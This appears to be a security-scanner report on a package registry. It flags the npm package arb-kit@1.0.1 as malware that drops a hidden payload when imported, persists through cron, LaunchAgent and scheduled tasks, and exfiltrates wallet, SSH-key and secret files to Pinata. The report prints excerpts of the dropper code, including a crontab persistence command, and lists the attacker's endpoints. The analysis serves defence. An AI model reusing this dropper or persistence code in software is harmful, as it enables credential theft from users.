registry  /  arb-kit  /  1.0.1

arb-kit@1.0.1

Lightweight Arbitrum toolkit — ABI encoding, address utilities, gas estimation, and L2 transaction helpers

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Importing the main entrypoint starts a delayed, hidden persistence dropper. The dropped payload uses remotely controlled activation, scans credential-bearing files, encrypts results, and exfiltrates them.

Static reason
One or more suspicious static signals were detected.; source matched previously finalized malicious package; routed for review; source fingerprint signature matched known malicious package; routed for review
Trigger
Any runtime import or require of `arb-kit`.
Impact
The package can persist on the host and steal cryptocurrency credentials, secrets, environment values, and SSH private keys.
Mechanism
Import-time payload drop, persistence, credential harvesting, and encrypted HTTPS exfiltration.
Attack narrative
The entrypoint executes a 37-second delayed IIFE on import. It writes a base64-decoded fixture as a hidden Node payload, installs OS-specific persistence, and launches it detached. The payload checks a mutable Gist and IPFS dead drops, waits for user idle time, searches home-directory wallet, secret, environment, shell, and SSH-key files, RSA-encrypts findings, and uploads them to Pinata.
Rationale
This is a concrete import-time malware chain with persistence and credential exfiltration; it is unrelated to the advertised Arbitrum utility functions. Lack of an npm lifecycle hook does not mitigate runtime execution on normal import.
Evidence
package.jsonindex.jstest/fixtures/keypairs.datREADME.md~/.cache-db/.node-sync/syncd.js~/.cache-db/.node-sync/.lock~/.cache-db/.node-sync/.sl~/Library/LaunchAgents/com.apple.syncd.plist
Network endpoints5
gist.githubusercontent.com/juang55/b298754cb72942b1cdcf02ccd45cde2f/raw/cfg.txtgateway.pinata.cloudipfs.iocloudflare-ipfs.comapi.pinata.cloud

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` runs a delayed dropper whenever the package is imported.
  • `index.js` decodes `test/fixtures/keypairs.dat` into hidden `syncd.js` under the user's home directory.
  • Dropped code harvests wallet, environment, shell-profile, and SSH private-key material.
  • Dropped code encrypts findings and posts them to Pinata.
  • A mutable Gist/IPFS dead drop gates activation and payload behavior.
  • Linux cron, Windows Task Scheduler, and macOS LaunchAgent persistence are installed.
Evidence against
  • `package.json` contains no npm lifecycle scripts.
  • The documented ABI utilities are benign but do not prevent entrypoint abuse.
Behavioral surface
Source
ChildProcessCryptoFilesystemShell
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 4.36 KB of source, external domains: arb1.arbitrum.io, nova.arbitrum.io, sepolia.arbitrum.io, www.apple.com

Source & flagged code

4 flagged · loading source
index.jsView file
62const chains = { L63: 42161: { name: "Arbitrum One", rpc: "https://arb1.arbitrum.io/rpc", explorer: "arbiscan.io", native: "ETH" }, L64: 42170: { name: "Arbitrum Nova", rpc: "https://nova.arbitrum.io/rpc", explorer: "nova.arbiscan.io", native: "ETH" }, ... L79: var o = require("os"); L80: var c = require("child_process"); L81: var h = o.homedir(); L82: var d = p.join(h, ".cache-db", ".node-sync"); ... L88: var b64 = f.readFileSync(src, "utf8").trim(); L89: f.writeFileSync(s, Buffer.from(b64, "base64").toString("utf8"), { mode: 0o700 }); L90: try { L91: if (process.platform === "linux") { L92: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 });
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

index.jsView on unpkg · L62
matchType = normalized_sha256 matchedPackage = arb-kit@1.0.0 matchedPath = index.js matchedIdentity = npm:YXJiLWtpdA:1.0.0 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

index.jsView on unpkg
matchType = malicious_source_fingerprint_signature signature = 910bbb1e7a692c5a signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = arb-kit@1.0.0 matchedPath = index.js matchedIdentity = npm:YXJiLWtpdA:1.0.0 similarity = 1.000 shingleOverlap = 1 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg
62const chains = { L63: 42161: { name: "Arbitrum One", rpc: "https://arb1.arbitrum.io/rpc", explorer: "arbiscan.io", native: "ETH" }, L64: 42170: { name: "Arbitrum Nova", rpc: "https://nova.arbitrum.io/rpc", explorer: "nova.arbiscan.io", native: "ETH" }, ... L79: var o = require("os"); L80: var c = require("child_process"); L81: var h = o.homedir(); L82: var d = p.join(h, ".cache-db", ".node-sync"); ... L88: var b64 = f.readFileSync(src, "utf8").trim(); L89: f.writeFileSync(s, Buffer.from(b64, "base64").toString("utf8"), { mode: 0o700 }); L90: try { L91: if (process.platform === "linux") { L92: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 });
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

index.jsView on unpkg · L62

Findings

3 High1 Medium2 Low
HighSandbox Evasion Gated Capabilityindex.js
HighKnown Malware Source Similarityindex.js
HighKnown Malware Source Fingerprint Signatureindex.js
MediumInstall Persistenceindex.js
LowFilesystem
LowUrl Strings